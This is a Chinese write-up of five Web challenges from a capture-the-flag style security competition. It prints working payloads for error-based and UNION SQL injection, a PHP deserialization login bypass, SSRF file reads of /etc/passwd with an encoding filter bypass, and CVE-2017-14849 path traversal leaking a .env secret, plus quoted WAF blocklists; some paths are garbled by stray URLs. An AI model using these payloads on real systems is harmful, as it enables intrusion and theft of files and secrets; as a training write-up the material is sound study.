网络安全管理职业技能竞赛Web writeup

网络安全管理职业技能竞赛Web writeup本文首发于“合天网安实验室” 作者:ch3ng本文涉及知识点靶场练习:CTF从入门到实践-CTF一站式学习平台-合天网安实验室0x01 easy_sql一开始看到是easys

本文首发于“合天网安实验室” 作者:ch3ng

本文涉及知识点靶场练习:CTF从入门到实践-CTF一站式学习平台-合天网安实验室

0x01 easy_sql

一开始看到是easysql,那就先上sqlmap跑跑看,跑出了数...

本文首发于“合天网安实验室” 作者:ch3ng

本文涉及知识点靶场练习:CTF从入门到实践-CTF一站式学习平台-合天网安实验室

0x01 easy_sql

一开始看到是easysql,那就先上sqlmap跑跑看,跑出了数据库名security以及若干表名

继续跑flag,结果没跑出来,最后还是上手工了。。。

测试输入一个单引号,页面无反应,但是在源码中发现了又报错信息

接着用单引号和括号闭合,报错注入,之后想了一下,为什么页面没有回显呢,原来是因为错误信息居然显示白色,前期被骗了很久,用鼠标描一下即可看到

uname=aaa') or updatexml(1,concat(0x7e,mid((select * from flag),1,25)),1)%23&passwd=bbbb

uname=aaa') OR updatexml(1,concat(0x7e,mid((select * from flag),23,50)),1)%23&passwd=bbbb

0x02 ezsqli

开局一个输入框

查看hint得到源码

<?php

//a "part" of the source code here

function sqlWaf($s)

{

$filter='/xml|extractvalue|regexp|copy|read|file|select|between|from|where|create|grand|dir|insert|link|substr|mid|server|drop|=|>|<|;|"|\^|\||\ |\'/i';

if (preg_match($filter,$s))

return False;

return True;

}

if (isset($_POST['username']) && isset($_POST['password'])) {

if (!isset($_SESSION['VerifyCode']))

die("?");

$username=strval($_POST['username']);

$password=strval($_POST['password']);

if ( !sqlWaf($password) )

alertMes('damn hacker' ,"https://www.freebuf.com/articles/network/index.php");

$sql="SELECT * FROM users WHERE username='${username}' AND password='${password}'";

// password format: /[A-Za-z0-9]/

$result=$conn->query($sql);

if ($result->num_rows > 0) {

$row=$result->fetch_assoc();

if ( $row['username']==='admin' && $row['password'] )

{

if ($row['password']==$password)

{

$message=$FLAG;

} else {

$message="username or password wrong, are you admin?";

}

} else {

$message="wrong user";

}

} else {

$message="user not exist or wrong password";

}

}

?>

password被过滤了,usename没有过滤,使用联合查询,构造username和password返回admin即可

username=admin1'+union+select+'admin','admin','admin'%23&password=admin&captcha=LSOK

0x03 warmup

下载源码开始审计,在index.php中发现了unserialize,估计是考察反序列化的利用了

···

if (isset ($_COOKIE['last_login_info'])) {

$last_login_info=unserialize (base64_decode ($_COOKIE['last_login_info']));

try {

if (is_array($last_login_info) && $last_login_info['ip'] !=$_SERVER['REMOTE_ADDR']) {

die('WAF info: your ip status has been changed, you are dangrous.');

}

} catch(Exception $e) {

die('Error');

}

} else {

$cookie=base64_encode (serialize (array ( 'ip'=> $_SERVER['REMOTE_ADDR']))) ;

setcookie ('last_login_info', $cookie, time () + (86400 * 30));

}

···

conn.php源码

<?php

include 'flag.php';

class SQL {

public $table='';

public $username='';

public $password='';

public $conn;

public function __construct() {

}

public function connect() {

$this->conn=new mysqli("localhost", "xxxxx", "xxxx", "xxxx");

}

public function check_login(){

$result=$this->query();

if ($result===false) {

die("database error, please check your input");

}

$row=$result->fetch_assoc();

if($row===NULL){

die("username or password incorrect!");

}else if($row['username']==='admin'){

$flag=file_get_contents('flag.php');

echo "welcome, admin! this is your flag -> ".$flag;

}else{

echo "welcome! but you are not admin";

}

$result->free();

}

public function query() {

$this->waf();

return $this->conn->query ("select username,password from ".$this->table." where username='".$this->username."' and password='".$this->password."'");

}

public function waf(){

$blacklist=["union", "join", "!", """, "#", "$", "%", "&", ".", "/", ":", ";", "^", "_", "`", "", "<", ">", "?", "@", "[", "\", "]" , "*", "+", "-"];

foreach ($blacklist as $value) {

if(strripos($this->table, $value)){

die('bad hacker,go out!');

}

}

foreach ($blacklist as $value) {

if(strripos($this->username, $value)){

die('bad hacker,go out!');

}

}

foreach ($blacklist as $value) {

if(strripos($this->password, $value)){

die('bad hacker,go out!');

}

}

}

public function __wakeup(){

if (!isset ($this->conn)) {

$this->connect ();

}

if($this->table){

$this->waf();

}

$this->check_login();

$this->conn->close();

}

}

?>

可以看到在check_login中,有个flag的输出点,前提是我们需要伪造成admin用户

继续往下看,有个执行SQL语句的地方

public function query() {

$this->waf();

return $this->conn->query ("select username,password from ".$this->table." where username='".$this->username."' and password='".$this->password."'");

}

下面还有个waf,看了一下,发现我们需要构造的万能密码所用到的字符不会被ban

$blacklist=["union", "join", "!", """, "#", "$", "%", "&", ".", "/", ":", ";", "^", "_", "`", "", "<", ">", "?", "@", "[", "\", "]" , "*", "+", "-"];

foreach ($blacklist as $value) {

if(strripos($this->table, $value)){

die('bad hacker,go out!');

}

}

所以这里我们可以利用SQL注入来变成admin登录,username改为admin,password为万能密码a' or '1'='1,代码如下:

<?php

include "conn.php";

$sql=new SQL();

$sql->table="users";

$sql->username="admin";

$sql->password="a'or'1'='1";

$a=serialize($sql);

echo $a;

echo base64_encode ($a);

得到TzozOiJTUUwiOjQ6e3M6NToidGFibGUiO3M6NToidXNlcnMiO3M6ODoidXNlcm5hbWUiO3M6NToiYWRtaW4iO3M6ODoicGFzc3dvcmQiO3M6MTA6ImEnb3InMSc9JzEiO3M6NDoiY29ubiI7Tjt9,输入之后获得flag

0x04 ssrfME

访问可以看到有两个输入点,一个可以输入url,一个是验证码

脚本爆破验证码

<?php
for ($i=0; $i < 1000000000; $i++) { 
       $a=substr(md5($i), -6, 6);       if ($a=="d17b5b") {              echo $i;              break;       }
}
?>

尝试使用file协议读取,发现读取/etc/passwd成功

读取/flag,没成功,尝试读取/var/www/html/index.php,得到源码,原来是有个waf过滤了flag

···

if (isset($_POST['url']) && isset($_POST['captcha']) && !empty($_POST['url']) && !empty($_POST['captcha']))

{

$url=$_POST['url'];

$captcha=$_POST['captcha'];

$is_post=1;

if ( $captcha !==$_SESSION['answer'])

{

$die_mess="wrong captcha";

$is_die=1;

}

if ( preg_match('/flag|proc|log/i', $url) )

{

$die_mess="hacker";

$is_die=1;

}

}

···

file协议读flag,利用两个url编码flag绕过

url=file:///%25%36%36%25%36%63%25%36%31%25%36%37&captcha=43049

0x05 SecretGuess

题目给了源码,但是不全

在index.html中发现了source,点击可以看到源码

const express=require('express');

const path=require('path');

const env=require('dotenv').config();

const bodyParser=require('body-parser');

const crypto=require('crypto');

const fs=require('fs')

const hbs=require('hbs');

const process=require("child_process")

const app=express();

app.use('/static', express.static(path.join(__dirname, 'public')));

app.use(bodyParser.urlencoded({ extended: false }))

app.use(bodyParser.json());

app.set('views', path.join(__dirname, "views/"))

app.engine('html', hbs.__express)

app.set('view engine', 'html')

app.get('/', (req, res)=> { res.render("index")

})

app.post('/', (req, res)=> { if (req.body.auth && typeof req.body.auth==='string' && crypto.createHash('md5').update(env.parsed.secret).digest('hex')===req.body.auth ) { res.render("index", {result: process.execSync("echo $FLAG")}) } else { res.render("index", {result: "wrong secret"}) }

})

app.get('/source', (req, res)=> { res.end(fs.readFileSync(path.join(__dirname, "app.js")))

})

app.listen(80, "0.0.0.0");

在给出dockerfile中,文件内容为

FROM node:8.5

COPY https://www.freebuf.com/articles/network/src /usr/local/app

WORKDIR /usr/local/app

ENV FLAG=flag{**********}

RUN npm i --registry=https://registry.npm.taobao.org

EXPOSE 80

CMD node /usr/local/app/app.js

去搜索相关内容,发现了可能会存在CVE-2017-14849漏洞

输入/static/https://www.freebuf.com/a///etc/passwd,利用成功

接着去获取secret,/static/https://www.freebuf.com/a//usr/local/app/.env,得到secret=CVE-2017-14849

根据源码中的条件

if (req.body.auth && typeof req.body.auth==='string' && crypto.createHash('md5').update(env.parsed.secret).digest('hex')===req.body.auth )

我们将CVE-2017-14849进行md5加密之后提交即可获得flag,auth=10523ece56c1d399dae057b3ac1ad733

内容来源网络,如有侵权,联系删除,本文地址:https://www.230890.com/zhan/7199.html

(0)

相关推荐

  • 华贸中心与华为达成战略合作

    北京商报讯(记者 石飞月)11月5日,华贸中心与华为技术有限公司在北京签署战略合作框架协议。未来三年,双方将在华贸数字化转型领域开展深度合作,凝聚华为优质资源打造智慧商业综合体场景的样板标杆,从顶层规划咨询、架构和方案设计到落地实施等各环节提供统筹且具有前瞻性的宏观视角,推动北京华贸中心、苏州华贸中心、南京华贸中心等项目的智慧化进程。

    科技 2021年11月5日
  • 关羽被徐晃击败,关平打得过徐晃吗

    为什么有人说关羽打不过徐晃,有依据吗?网友提问:为什么有人说关羽打不过徐晃,有依据吗?优质回答:在三国中徐晃肯定是打不过关羽的,关羽斩颜良诛文丑,而徐晃被派去截粮草,被文丑打败,仓皇逃去,由此可见,关羽之勇>徐晃,但是徐

    攻略 2021年11月13日
  • 值多少钱,金银纪念币回收价格表2021

    值多少钱,金银纪念币回收价格表2021 百年系列金银纪念币这一段时间市场上收购的情况越来越少,而出售的情况也越来越多,最近几天基本上很少有看到收购百年系列金银纪念币的相关信息,这种情况从侧面说明百年系列金银纪念币的热

    攻略 2021年10月7日
  • 背靠背的意思(字义,诗词)

    词组背靠背的意思(字义,诗词)基本解释详细字义 背靠背拼音:bèi kào bèi注音:ㄅㄟˋ ㄎㄠˋ ㄅㄟˋ解释:1.背部靠着背部:他俩~地坐着。 2.指不当着有关人的面(批评、揭发检举等):为了避免矛盾激化,

    阅读 2021年11月12日
  • 查重率多少合格,论文查重率70%合格吗

    查重率多少合格,论文查重率70%合格吗 期刊论文发表都是要经过期刊论文查重的,只有你的重复率达到标准才能参加下一步的审核,审核通过之后才能成功发表,所以说期刊论文的重复率是非常重要的,那么期刊论文查重率多少才算合格呢

    攻略 2021年10月16日
  • 抖音小店无货源,爆单必备的几个选品小技巧

    抖音小店无货源,爆单必备的几个选品小技巧
    x大家好,我是电商小V
    咱们开小店是不是经常会有这种情况发生,
    自己小店的商品有浏览量,但是呢,出单很少,基本不出单,
    发生这样的事情,大部分的原因就是选品没有选好,俗话说:7

    电商 2021年9月8日